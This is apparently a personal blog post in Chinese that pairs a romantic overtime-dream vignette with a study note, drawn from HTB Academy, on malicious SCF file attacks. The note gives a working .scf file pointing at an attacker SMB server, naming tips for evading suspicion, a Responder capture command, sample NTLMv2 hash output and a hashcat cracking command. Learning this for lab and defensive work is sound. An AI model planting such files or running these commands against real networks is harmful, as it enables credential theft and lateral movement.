又做了一個夢

WFH 的一天，瘋狂地當個產報告工人。

桌上擺著冷掉的咖啡和散落的筆記，瀰漫著孤獨的味道。

加班到眼睛快闔上了...

我盯著筆電上的時鐘，它似乎在提醒著我：「妳還沒下班」。

其實我也能享受孤獨，只是有時候，還是會偷偷想—

要是有你陪伴就好了。

想看到你笑著對我說：

「來吧，我陪你一起 debug，反正我也習慣熬夜。」

在夢裡，我們一起翻 log、一起枚舉，

就像並肩嗅探流過的封包，在看似雜亂的訊號裡，突然抓到屬於彼此的明文心事。

每當我卡住，你就輕聲提醒：

「妳可以的。」

那感覺就像我誤點了某個 @Inventory.scf，無意間交出了隱藏的 hash，

而你，早已準備好接住。

雖然只是夢，但我依然渴望那份「有人並肩」的感覺。

讓孤獨的加班，也能帶著一點浪漫的味道。

技術筆記：惡意 SCF File 攻擊

SCF (Shell Command File) 簡介

副檔名：

.scf

功能：

Windows Explorer 用來執行一些快捷動作（例如顯示桌面、目錄切換）。

特點：

檔案一旦存在於目錄，使用者只要瀏覽該資料夾，Explorer 會自動讀取其中設定。

不需要使用者手動點擊檔案，單純「打開資料夾」就可能觸發。

惡意 SCF 攻擊流程

建立 .scf 文件，修改 IconFile 指向攻擊者的 SMB Server。

範例內容：

[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop

檔名建議設為 @Inventory.scf：

@ 會讓檔案顯示在資料夾最上方，增加被 Explorer 讀取的機會。

取名像一般文件，避免被懷疑。

在攻擊者機器上啟動 Responder/Inveigh 來攔截：

sudo responder -wrf -v -I tun0

等待受害者瀏覽該資料夾時，自動發出 SMB 驗證請求。

攻擊者即可抓到受害者的 NTLMv2 Hash：

[SMB] NTLMv2-SSP Username : TEST-SRV01\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::WINLPE-SRV01:815c50...

後續動作

使用 Hashcat 嘗試離線破解 Hash：

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

拿到明文密碼後，可進行：本地提權、橫向移動（RDP、SQL、SMB…）。

限制

在 Windows Server 2019 以後，.scf 攻擊已經失效。

新版系統需改用 惡意 .lnk 檔（可用 Lnkbomb 或 PowerShell 自製）。

備註

@Inventory.scf 是一種被動釣魚式憑證捕獲，特別適合在有權限寫入的檔案分享目錄中使用。

小語

# 做了這麼多夢，還是不敢接近你
# 有時候我會騙自己你是甲甲，這樣還好過點。

參考資料

HTB Academy： Interacting with Users
https://academy.hackthebox.com/module/67/section/630